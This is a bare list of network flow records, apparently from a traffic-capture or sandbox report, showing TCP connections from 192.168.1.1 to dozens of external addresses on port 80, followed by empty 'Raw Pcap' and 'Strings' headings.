Flows TCP192.168.1.1:1064 ➝ 192.232.219.235:80
Flows TCP192.168.1.1:1065 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1066 ➝ 50.63.42.1:80
Flows TCP192.168.1.1:1067 ➝ 50.62.245.1:80
Flows TCP192.168.1.1:1068 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1069 ➝ 178.255.42.139:80
Flows TCP192.168.1.1:1070 ➝ 185.14.56.94:80
Flows TCP192.168.1.1:1071 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1072 ➝ 173.234.209.98:80
Flows TCP192.168.1.1:1073 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1074 ➝ 87.106.167.110:80
Flows TCP192.168.1.1:1075 ➝ 62.149.226.198:80
Flows TCP192.168.1.1:1076 ➝ 107.180.44.135:80
Flows TCP192.168.1.1:1077 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1078 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1079 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1080 ➝ 80.88.88.152:80
Flows TCP192.168.1.1:1081 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1082 ➝ 184.168.26.1:80
Flows TCP192.168.1.1:1083 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1084 ➝ 50.62.69.1:80
Flows TCP192.168.1.1:1085 ➝ 107.180.44.125:80
Flows TCP192.168.1.1:1086 ➝ 184.168.221.44:80
Flows TCP192.168.1.1:1087 ➝ 192.185.48.135:80
Flows TCP192.168.1.1:1088 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1089 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1090 ➝ 106.187.103.246:80
Flows TCP192.168.1.1:1091 ➝ 173.234.209.98:80
Flows TCP192.168.1.1:1092 ➝ 128.140.220.8:80
Flows TCP192.168.1.1:1093 ➝ 50.63.95.1:80
Flows TCP192.168.1.1:1094 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1095 ➝ 107.180.26.90:80
Flows TCP192.168.1.1:1096 ➝ 192.254.186.154:80
Flows TCP192.168.1.1:1097 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1098 ➝ 69.163.208.246:80
Flows TCP192.168.1.1:1099 ➝ 72.167.131.9:80
Flows TCP192.168.1.1:1100 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1101 ➝ 107.180.4.26:80
Flows TCP192.168.1.1:1102 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1103 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1104 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1105 ➝ 50.62.104.1:80
Flows TCP192.168.1.1:1106 ➝ 107.180.4.133:80
Flows TCP192.168.1.1:1107 ➝ 62.182.61.62:80
Flows TCP192.168.1.1:1108 ➝ 216.38.129.210:80
Flows TCP192.168.1.1:1109 ➝ 69.197.163.146:80
Flows TCP192.168.1.1:1110 ➝ 192.232.219.235:80
Flows TCP192.168.1.1:1111 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1112 ➝ 50.63.42.1:80
Flows TCP192.168.1.1:1113 ➝ 50.62.245.1:80
Flows TCP192.168.1.1:1114 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1115 ➝ 178.255.42.139:80
Flows TCP192.168.1.1:1116 ➝ 185.14.56.94:80
Flows TCP192.168.1.1:1117 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1118 ➝ 173.234.209.98:80
Flows TCP192.168.1.1:1119 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1120 ➝ 87.106.167.110:80
Flows TCP192.168.1.1:1121 ➝ 62.149.226.198:80
Flows TCP192.168.1.1:1122 ➝ 107.180.44.135:80

Raw Pcap

Strings